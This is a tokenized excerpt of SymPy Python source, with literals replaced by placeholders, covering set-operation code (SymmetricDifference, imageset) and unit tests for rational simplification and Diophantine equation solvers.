SymmetricDifference ( Set ) : <EOL> """<STR_LIT>""" <EOL> is_SymmetricDifference = True <EOL> def __new__ ( cls , a , b , evaluate = True ) : <EOL> if evaluate : <EOL> return SymmetricDifference . reduce ( a , b ) <EOL> return Basic . 
__new__ ( cls , a , b ) <EOL> @ staticmethod <EOL> def reduce ( A , B ) : <EOL> result = B . _symmetric_difference ( A ) <EOL> if result is not None : <EOL> return result <EOL> else : <EOL> return SymmetricDifference ( A , B , evaluate = False ) <EOL> def imageset ( * args ) : <EOL> r"""<STR_LIT>""" <EOL> from sympy . core import Lambda <EOL> from sympy . sets . fancysets import ImageSet <EOL> from sympy . geometry . util import _uniquely_named_symbol <EOL> if len ( args ) not in ( <NUM_LIT:2> , <NUM_LIT:3> ) : <EOL> raise ValueError ( '<STR_LIT>' % len ( args ) ) <EOL> set = args [ - <NUM_LIT:1> ] <EOL> if not isinstance ( set , Set ) : <EOL> name = func_name ( set ) <EOL> raise ValueError ( <EOL> '<STR_LIT>' % name ) <EOL> if len ( args ) == <NUM_LIT:3> : <EOL> f = Lambda ( * args [ : <NUM_LIT:2> ] ) <EOL> elif len ( args ) == <NUM_LIT:2> : <EOL> f = args [ <NUM_LIT:0> ] <EOL> if isinstance ( f , Lambda ) : <EOL> pass <EOL> elif ( <EOL> isinstance ( f , FunctionClass ) <EOL> or func_name ( f ) == '<STR_LIT>' <EOL> ) : <EOL> var = _uniquely_named_symbol ( Symbol ( '<STR_LIT:x>' ) , f ( Dummy ( ) ) ) <EOL> expr = f ( var ) <EOL> f = Lambda ( var , expr ) <EOL> else : <EOL> raise TypeError ( filldedent ( '''<STR_LIT>''' % <EOL> func_name ( f ) ) ) <EOL> r = set . _eval_imageset ( f ) <EOL> if isinstance ( r , ImageSet ) : <EOL> f , set = r . args <EOL> if f . variables [ <NUM_LIT:0> ] == f . expr : <EOL> return set <EOL> if isinstance ( set , ImageSet ) : <EOL> if len ( set . lamda . variables ) == <NUM_LIT:1> and len ( f . variables ) == <NUM_LIT:1> : <EOL> return imageset ( Lambda ( set . lamda . variables [ <NUM_LIT:0> ] , <EOL> f . expr . subs ( f . variables [ <NUM_LIT:0> ] , set . lamda . expr ) ) , <EOL> set . base_set ) <EOL> if r is not None : <EOL> return r <EOL> return ImageSet ( f , set ) </s>
<s> from sympy import ratsimpmodprime , ratsimp , Rational , sqrt , pi , log , erf <EOL> from sympy . abc import x , y , z , t , a , b , c , d , e , f , g , h , i , k <EOL> def test_ratsimp ( ) : <EOL> f , g = <NUM_LIT:1> / x + <NUM_LIT:1> / y , ( x + y ) / ( x * y ) <EOL> assert f != g and ratsimp ( f ) == g <EOL> f , g = <NUM_LIT:1> / ( <NUM_LIT:1> + <NUM_LIT:1> / x ) , <NUM_LIT:1> - <NUM_LIT:1> / ( x + <NUM_LIT:1> ) <EOL> assert f != g and ratsimp ( f ) == g <EOL> f , g = x / ( x + y ) + y / ( x + y ) , <NUM_LIT:1> <EOL> assert f != g and ratsimp ( f ) == g <EOL> f , g = - x - y - y ** <NUM_LIT:2> / ( x + y ) + x ** <NUM_LIT:2> / ( x + y ) , - <NUM_LIT:2> * y <EOL> assert f != g and ratsimp ( f ) == g <EOL> f = ( a * c * x * y + a * c * z - b * d * x * y - b * d * z - b * t * x * y - b * t * x - b * t * z + <EOL> e * x ) / ( x * y + z ) <EOL> G = [ a * c - b * d - b * t + ( - b * t * x + e * x ) / ( x * y + z ) , <EOL> a * c - b * d - b * t - ( b * t * x - e * x ) / ( x * y + z ) ] <EOL> assert f != g and ratsimp ( f ) in G <EOL> A = sqrt ( pi ) <EOL> B = log ( erf ( x ) - <NUM_LIT:1> ) <EOL> C = log ( erf ( x ) + <NUM_LIT:1> ) <EOL> D = <NUM_LIT:8> - <NUM_LIT:8> * erf ( x ) <EOL> f = A * B / D - A * C / D + A * C * erf ( x ) / D - A * B * erf ( x ) / D + <NUM_LIT:2> * A / D <EOL> assert ratsimp ( f ) == A * B / <NUM_LIT:8> - A * C / <NUM_LIT:8> - A / ( <NUM_LIT:4> * erf ( x ) - <NUM_LIT:4> ) <EOL> def test_ratsimpmodprime ( ) : <EOL> a = y ** <NUM_LIT:5> + x + y <EOL> b = x - y <EOL> F = [ x * y ** <NUM_LIT:5> - x - y ] <EOL> assert ratsimpmodprime ( a / b , F , x , y , order = '<STR_LIT>' ) == ( x ** <NUM_LIT:2> + x * y + x + y ) / ( x ** <NUM_LIT:2> - x * y ) <EOL> a = x + y ** <NUM_LIT:2> - <NUM_LIT:2> <EOL> b = x + y ** <NUM_LIT:2> - y - <NUM_LIT:1> <EOL> F = [ x * y - <NUM_LIT:1> ] <EOL> assert ratsimpmodprime ( a / b , F , x , y , order = '<STR_LIT>' ) == ( <NUM_LIT:1> + y - x ) / ( y - x ) <EOL> a = <NUM_LIT:5> * x ** <NUM_LIT:3> + <NUM_LIT> * x ** 
<NUM_LIT:2> + <NUM_LIT:4> * x * y + <NUM_LIT> * x + <NUM_LIT:12> * y + <NUM_LIT:15> <EOL> b = <NUM_LIT:7> * x ** <NUM_LIT:3> - y * x ** <NUM_LIT:2> + <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:2> * x * y + <NUM_LIT:15> * y + <NUM_LIT> * x + <NUM_LIT> <EOL> F = [ x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - <NUM_LIT:1> ] <EOL> assert ratsimpmodprime ( a / b , F , x , y , order = '<STR_LIT>' ) == ( <NUM_LIT:1> + <NUM_LIT:5> * y - <NUM_LIT:5> * x ) / ( <NUM_LIT:8> * y - <NUM_LIT:6> * x ) <EOL> a = x * y - x - <NUM_LIT:2> * y + <NUM_LIT:4> <EOL> b = x + y ** <NUM_LIT:2> - <NUM_LIT:2> * y <EOL> F = [ x - <NUM_LIT:2> , y - <NUM_LIT:3> ] <EOL> assert ratsimpmodprime ( a / b , F , x , y , order = '<STR_LIT>' ) == Rational ( <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> assert ratsimpmodprime ( x , [ y - <NUM_LIT:2> * x ] , order = '<STR_LIT>' ) == y / <NUM_LIT:2> </s>
<s> from sympy import ( Add , factor_list , igcd , Matrix , Mul , S , simplify , <EOL> Symbol , symbols , Eq , pi , factorint , oo , powsimp ) <EOL> from sympy . core . function import _mexpand <EOL> from sympy . core . compatibility import range <EOL> from sympy . functions . elementary . trigonometric import sin <EOL> from sympy . solvers . diophantine import ( descent , diop_bf_DN , diop_DN , <EOL> diop_solve , diophantine , divisible , equivalent , find_DN , ldescent , length , <EOL> reconstruct , partition , power_representation , <EOL> prime_as_sum_of_two_squares , square_factor , sum_of_four_squares , <EOL> sum_of_three_squares , transformation_to_DN , transformation_to_normal , <EOL> classify_diop , base_solution_linear , cornacchia , sqf_normal , <EOL> diop_ternary_quadratic_normal , _diop_ternary_quadratic_normal , <EOL> gaussian_reduce , holzer , diop_general_pythagorean , <EOL> _diop_general_sum_of_squares , _nint_or_floor , _odd , _even , <EOL> _remove_gcd , check_param , parametrize_ternary_quadratic , <EOL> diop_ternary_quadratic , diop_linear , diop_quadratic , <EOL> diop_general_sum_of_squares , sum_of_powers , sum_of_squares , <EOL> diop_general_sum_of_even_powers , _can_do_sum_of_squares ) <EOL> from sympy . utilities import default_sort_key <EOL> from sympy . utilities . 
pytest import slow , raises , XFAIL <EOL> a , b , c , d , p , q , x , y , z , w , t , u , v , X , Y , Z = symbols ( <EOL> "<STR_LIT>" , integer = True ) <EOL> t_0 , t_1 , t_2 , t_3 , t_4 , t_5 , t_6 = symbols ( "<STR_LIT>" , integer = True ) <EOL> m1 , m2 , m3 = symbols ( '<STR_LIT>' , integer = True ) <EOL> n1 = symbols ( '<STR_LIT>' , integer = True ) <EOL> def diop_simplify ( eq ) : <EOL> return _mexpand ( powsimp ( _mexpand ( eq ) ) ) <EOL> def test_input_format ( ) : <EOL> raises ( TypeError , lambda : diophantine ( sin ( x ) ) ) <EOL> raises ( TypeError , lambda : diophantine ( <NUM_LIT:3> ) ) <EOL> raises ( TypeError , lambda : diophantine ( x / pi - <NUM_LIT:3> ) ) <EOL> def test_univariate ( ) : <EOL> assert diop_solve ( ( x - <NUM_LIT:1> ) * ( x - <NUM_LIT:2> ) ** <NUM_LIT:2> ) == set ( [ ( <NUM_LIT:1> , ) , ( <NUM_LIT:2> , ) ] ) <EOL> assert diop_solve ( ( x - <NUM_LIT:1> ) * ( x - <NUM_LIT:2> ) ) == set ( [ ( <NUM_LIT:1> , ) , ( <NUM_LIT:2> , ) ] ) <EOL> def test_classify_diop ( ) : <EOL> raises ( TypeError , lambda : classify_diop ( x ** <NUM_LIT:2> / <NUM_LIT:3> - <NUM_LIT:1> ) ) <EOL> raises ( ValueError , lambda : classify_diop ( <NUM_LIT:1> ) ) <EOL> raises ( NotImplementedError , lambda : classify_diop ( w * x * y * z - <NUM_LIT:1> ) ) <EOL> assert classify_diop ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:15> * x - <NUM_LIT> ) == ( <EOL> [ x ] , { <NUM_LIT:1> : - <NUM_LIT> , x : <NUM_LIT:15> , x ** <NUM_LIT:2> : <NUM_LIT> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + z ) == ( <EOL> [ x , y , z ] , { x * y : <NUM_LIT:1> , z : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + z + w + x ** <NUM_LIT:2> ) == ( <EOL> [ w , x , y , z ] , { x * y : <NUM_LIT:1> , w : <NUM_LIT:1> , x ** <NUM_LIT:2> : <NUM_LIT:1> , z : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + x * z + x ** <NUM_LIT:2> + <NUM_LIT:1> ) == ( <EOL> [ x , y , z ] , { x * y : <NUM_LIT:1> , x * z : <NUM_LIT:1> , x ** <NUM_LIT:2> : <NUM_LIT:1> , 
<NUM_LIT:1> : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + z + w + <NUM_LIT> ) == ( <EOL> [ w , x , y , z ] , { x * y : <NUM_LIT:1> , w : <NUM_LIT:1> , <NUM_LIT:1> : <NUM_LIT> , z : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + z * w ) == ( <EOL> [ w , x , y , z ] , { x * y : <NUM_LIT:1> , w * z : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y ** <NUM_LIT:2> + <NUM_LIT:1> ) == ( <EOL> [ x , y ] , { x * y ** <NUM_LIT:2> : <NUM_LIT:1> , <NUM_LIT:1> : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> def test_linear ( ) : <EOL> assert diop_solve ( x ) == ( <NUM_LIT:0> , ) <EOL> assert diop_solve ( <NUM_LIT:1> * x ) == ( <NUM_LIT:0> , ) <EOL> assert diop_solve ( <NUM_LIT:3> * x ) == ( <NUM_LIT:0> , ) <EOL> assert diop_solve ( x + <NUM_LIT:1> ) == ( - <NUM_LIT:1> , ) <EOL> assert diop_solve ( <NUM_LIT:2> * x + <NUM_LIT:1> ) == ( None , ) <EOL> assert diop_solve ( <NUM_LIT:2> * x + <NUM_LIT:4> ) == ( - <NUM_LIT:2> , ) <EOL> assert diop_solve ( y + x ) == ( t_0 , - t_0 ) <EOL> assert diop_solve ( y + x + <NUM_LIT:0> ) == ( t_0 , - t_0 ) <EOL> assert diop_solve ( y + x - <NUM_LIT:0> ) == ( t_0 , - t_0 ) <EOL> assert diop_solve ( <NUM_LIT:0> * x - y - <NUM_LIT:5> ) == ( - <NUM_LIT:5> , ) <EOL> assert diop_solve ( <NUM_LIT:3> * y + <NUM_LIT:2> * x - <NUM_LIT:5> ) == ( <NUM_LIT:3> * t_0 - <NUM_LIT:5> , - <NUM_LIT:2> * t_0 + <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:2> * x - <NUM_LIT:3> * y - <NUM_LIT:5> ) == ( <NUM_LIT:3> * t_0 - <NUM_LIT:5> , <NUM_LIT:2> * t_0 - <NUM_LIT:5> ) <EOL> assert diop_solve ( - <NUM_LIT:2> * x - <NUM_LIT:3> * y - <NUM_LIT:5> ) == ( <NUM_LIT:3> * t_0 + <NUM_LIT:5> , - <NUM_LIT:2> * t_0 - <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:7> * x + <NUM_LIT:5> * y ) == ( <NUM_LIT:5> * t_0 , - <NUM_LIT:7> * t_0 ) <EOL> assert diop_solve ( <NUM_LIT:2> * x + <NUM_LIT:4> * y ) == ( <NUM_LIT:2> * t_0 , - t_0 ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:6> * y - <NUM_LIT:4> ) == ( <NUM_LIT:3> * 
t_0 - <NUM_LIT:2> , - <NUM_LIT:2> * t_0 + <NUM_LIT:2> ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:6> * y - <NUM_LIT:3> ) == ( None , None ) <EOL> assert diop_solve ( <NUM_LIT:0> * x + <NUM_LIT:3> * y - <NUM_LIT:4> * z + <NUM_LIT:5> ) == ( <NUM_LIT:4> * t_0 + <NUM_LIT:5> , <NUM_LIT:3> * t_0 + <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:3> * y - <NUM_LIT:4> * z + <NUM_LIT:5> ) == ( t_0 , <NUM_LIT:8> * t_0 + <NUM_LIT:4> * t_1 + <NUM_LIT:5> , <NUM_LIT:7> * t_0 + <NUM_LIT:3> * t_1 + <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:3> * y - <NUM_LIT:4> * z + <NUM_LIT:5> , None ) == ( <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:2> * y + <NUM_LIT:8> * z - <NUM_LIT:5> ) == ( None , None , None ) <EOL> assert diop_solve ( <NUM_LIT:5> * x + <NUM_LIT:7> * y - <NUM_LIT:2> * z - <NUM_LIT:6> ) == ( t_0 , - <NUM_LIT:3> * t_0 + <NUM_LIT:2> * t_1 + <NUM_LIT:6> , - <NUM_LIT:8> * t_0 + <NUM_LIT:7> * t_1 + <NUM_LIT> ) <EOL> assert diop_solve ( <NUM_LIT:3> * x - <NUM_LIT:6> * y + <NUM_LIT:12> * z - <NUM_LIT:9> ) == ( <NUM_LIT:2> * t_0 + <NUM_LIT:3> , t_0 + <NUM_LIT:2> * t_1 , t_1 ) <EOL> assert diop_solve ( <NUM_LIT:6> * w + <NUM_LIT:9> * x + <NUM_LIT:20> * y - z ) == ( t_0 , t_1 , t_1 + t_2 , <NUM_LIT:6> * t_0 + <NUM_LIT> * t_1 + <NUM_LIT:20> * t_2 ) <EOL> raises ( TypeError , lambda : diop_solve ( x / <NUM_LIT:2> ) ) <EOL> def test_quadratic_simple_hyperbolic_case ( ) : <EOL> assert diop_solve ( <NUM_LIT:3> * x * y + <NUM_LIT> * x - <NUM_LIT:12> * y + <NUM_LIT:1> ) == set ( [ ( - <NUM_LIT> , - <NUM_LIT:11> ) , ( <NUM_LIT:5> , - <NUM_LIT> ) ] ) <EOL> assert diop_solve ( <NUM_LIT:6> * x * y + <NUM_LIT:2> * x + <NUM_LIT:3> * y + <NUM_LIT:1> ) == set ( [ ] ) <EOL> assert diop_solve ( - <NUM_LIT> * x * y + <NUM_LIT:2> * x - <NUM_LIT:4> * y - <NUM_LIT> ) == set ( [ ( <NUM_LIT> , <NUM_LIT:0> ) ] ) <EOL> assert diop_solve ( - <NUM_LIT> * x * y - <NUM_LIT:30> * x - <NUM_LIT:12> * y - 
<NUM_LIT> ) == set ( [ ( - <NUM_LIT> , - <NUM_LIT:1> ) ] ) <EOL> assert diop_solve ( <NUM_LIT:2> * x * y + <NUM_LIT:5> * x + <NUM_LIT> * y + <NUM_LIT:7> ) == set ( [ ( - <NUM_LIT> , - <NUM_LIT:3> ) , ( - <NUM_LIT> , - <NUM_LIT:6> ) , ( - <NUM_LIT> , - <NUM_LIT:12> ) , ( - <NUM_LIT> , - <NUM_LIT> ) , ( - <NUM_LIT> , <NUM_LIT:64> ) , ( - <NUM_LIT> , <NUM_LIT:7> ) , ( - <NUM_LIT:9> , <NUM_LIT:1> ) , ( <NUM_LIT> , - <NUM_LIT:2> ) ] ) <EOL> assert diop_solve ( <NUM_LIT:6> * x * y + <NUM_LIT:9> * x + <NUM_LIT:2> * y + <NUM_LIT:3> ) == set ( [ ] ) <EOL> assert diop_solve ( x * y + x + y + <NUM_LIT:1> ) == set ( [ ( - <NUM_LIT:1> , t ) , ( t , - <NUM_LIT:1> ) ] ) <EOL> assert diophantine ( <NUM_LIT> * x * y ) <EOL> def test_quadratic_elliptical_case ( ) : <EOL> assert diop_solve ( <NUM_LIT:4> * x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + <NUM_LIT:5> * x - <NUM_LIT:11> * y + <NUM_LIT:12> ) == set ( [ ] ) <EOL> assert diop_solve ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + <NUM_LIT:2> * x + <NUM_LIT:2> * y + <NUM_LIT:2> ) == set ( [ ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ] ) <EOL> assert diop_solve ( <NUM_LIT:10> * x ** <NUM_LIT:2> + <NUM_LIT:12> * x * y + <NUM_LIT:12> * y ** <NUM_LIT:2> - <NUM_LIT> ) == set ( [ ( <NUM_LIT:1> , - <NUM_LIT:2> ) , ( - <NUM_LIT:1> , - <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( - <NUM_LIT:1> , <NUM_LIT:2> ) ] ) <EOL> def test_quadratic_parabolic_case ( ) : <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> - <NUM_LIT> * x * y + <NUM_LIT> * y ** <NUM_LIT:2> + <NUM_LIT:5> * x + <NUM_LIT:7> * y + <NUM_LIT:16> ) <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> - <NUM_LIT> * x * y + <NUM_LIT> * y ** <NUM_LIT:2> + <NUM_LIT:6> * x + <NUM_LIT:12> * y - <NUM_LIT:6> ) <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> + <NUM_LIT> * x * y + <NUM_LIT> * y ** <NUM_LIT:2> + <NUM_LIT:4> * x + <NUM_LIT:6> * y - <NUM_LIT:7> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:2> * x * y + y ** <NUM_LIT:2> + 
<NUM_LIT:2> * x + <NUM_LIT:2> * y + <NUM_LIT:1> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> * x + <NUM_LIT:2> * y + <NUM_LIT:1> ) <EOL> assert check_solutions ( y ** <NUM_LIT:2> - <NUM_LIT> * x + <NUM_LIT> ) <EOL> def test_quadratic_perfect_square ( ) : <EOL> assert check_solutions ( <NUM_LIT> * x * y ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:5> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> ) <EOL> assert check_solutions ( - <NUM_LIT:2> * x ** <NUM_LIT:2> - <NUM_LIT:3> * x * y + <NUM_LIT:2> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT> * y + <NUM_LIT> ) <EOL> assert check_solutions ( <NUM_LIT:12> * x ** <NUM_LIT:2> + <NUM_LIT> * x * y + <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x + <NUM_LIT:3> * y - <NUM_LIT:12> ) <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> + <NUM_LIT:10> * x * y + <NUM_LIT:2> * y ** <NUM_LIT:2> - <NUM_LIT:32> * x - <NUM_LIT> * y - <NUM_LIT> ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:4> * x * y - <NUM_LIT:3> * y - <NUM_LIT:8> * x - <NUM_LIT:3> ) <EOL> assert check_solutions ( - <NUM_LIT:4> * x * y - <NUM_LIT:4> * y ** <NUM_LIT:2> - <NUM_LIT:3> * y - <NUM_LIT:5> * x - <NUM_LIT:10> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:2> * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:9> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:6> * y ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:9> * y ** <NUM_LIT:2> - <NUM_LIT:4> * x - <NUM_LIT:12> * y - <NUM_LIT:3> ) <EOL> def test_quadratic_non_perfect_square ( ) : <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:5> * y ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> - <NUM_LIT:2> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:2> * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - x * y - y ** <NUM_LIT:2> - 
<NUM_LIT:3> * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:9> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:6> * y ) <EOL> def test_issue_9106 ( ) : <EOL> eq = - <NUM_LIT> - <NUM_LIT:2> * x * ( <NUM_LIT:3> * x - <NUM_LIT:1> ) + y * ( <NUM_LIT:3> * y - <NUM_LIT:1> ) <EOL> v = ( x , y ) <EOL> for sol in diophantine ( eq ) : <EOL> assert not diop_simplify ( eq . xreplace ( dict ( zip ( v , sol ) ) ) ) <EOL> @ slow <EOL> def test_quadratic_non_perfect_slow ( ) : <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> + <NUM_LIT:10> * x * y - <NUM_LIT:2> * y ** <NUM_LIT:2> - <NUM_LIT:32> * x - <NUM_LIT> * y - <NUM_LIT> ) <EOL> assert check_solutions ( - <NUM_LIT:3> * x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y + <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT:5> * x - <NUM_LIT:7> ) <EOL> assert check_solutions ( - <NUM_LIT:4> - x + <NUM_LIT:4> * x ** <NUM_LIT:2> - y - <NUM_LIT:3> * x * y - <NUM_LIT:4> * y ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:1> + <NUM_LIT:2> * x + <NUM_LIT:2> * x ** <NUM_LIT:2> + <NUM_LIT:2> * y + x * y - <NUM_LIT:2> * y ** <NUM_LIT:2> ) <EOL> def test_DN ( ) : <EOL> assert diop_DN ( <NUM_LIT:3> , <NUM_LIT:0> ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert diop_DN ( - <NUM_LIT> , - <NUM_LIT:5> ) == [ ] <EOL> assert diop_DN ( - <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( - <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( - <NUM_LIT:15> , <NUM_LIT> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT:0> , <NUM_LIT:5> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT:0> , <NUM_LIT:9> ) == [ ( <NUM_LIT:3> , t ) ] <EOL> assert diop_DN ( <NUM_LIT:9> , <NUM_LIT:0> ) == [ ( <NUM_LIT:3> * t , t ) ] <EOL> assert diop_DN ( <NUM_LIT:16> , <NUM_LIT> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT:9> , <NUM_LIT> ) == [ ( <NUM_LIT> , <NUM_LIT:4> ) ] <EOL> assert diop_DN ( <NUM_LIT:9> , - <NUM_LIT> ) == [ ( <NUM_LIT:12> , <NUM_LIT:6> ) ] <EOL> assert diop_DN ( <NUM_LIT:7> , 
<NUM_LIT:0> ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert diop_DN ( - <NUM_LIT:1> , <NUM_LIT:5> ) == [ ( <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> assert diop_DN ( - <NUM_LIT:1> , <NUM_LIT> ) == [ ( <NUM_LIT:5> , <NUM_LIT:12> ) , ( <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT:8> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT:5> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT:32> , <NUM_LIT:5> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT:32> , - <NUM_LIT:1> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:4> ) == [ ( <NUM_LIT:3> , <NUM_LIT:1> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:10> ) ] <EOL> assert equivalent ( - <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:4> ) == True <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:11> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:12> , <NUM_LIT:3> ) ] <EOL> assert set ( diop_DN ( <NUM_LIT> , <NUM_LIT:12> ) ) == set ( [ ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] ) <EOL> assert diop_DN ( 
<NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ( - <NUM_LIT:6> , <NUM_LIT:1> ) , ( <NUM_LIT:6> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:2> ) == [ ( <NUM_LIT> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:2> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:2> ) == [ ( <NUM_LIT:11> , <NUM_LIT:1> ) ] <EOL> assert equivalent ( <NUM_LIT:11> , <NUM_LIT:1> , - <NUM_LIT:11> , <NUM_LIT:1> , <NUM_LIT> , - <NUM_LIT:2> ) <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT> ) == [ ( - <NUM_LIT:10> , <NUM_LIT:1> ) , ( <NUM_LIT:10> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( <NUM_LIT:0> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:0> , t ) ] <EOL> assert diop_DN ( <NUM_LIT:0> , - <NUM_LIT:1> , t ) == [ ] <EOL> def test_bf_pell ( ) : <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:4> ) == [ ( <NUM_LIT:3> , <NUM_LIT:1> ) , ( - <NUM_LIT:3> , <NUM_LIT:1> ) , ( <NUM_LIT> , <NUM_LIT:10> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT:12> , <NUM_LIT:3> ) , ( - <NUM_LIT:12> , <NUM_LIT:3> ) , ( <NUM_LIT> , <NUM_LIT:11> ) , ( - <NUM_LIT> , <NUM_LIT:11> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:2> ) == [ ] <EOL> assert diop_bf_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:8> ) == [ ( <NUM_LIT:9> , <NUM_LIT:1> ) , ( - <NUM_LIT:9> , <NUM_LIT:1> ) ] 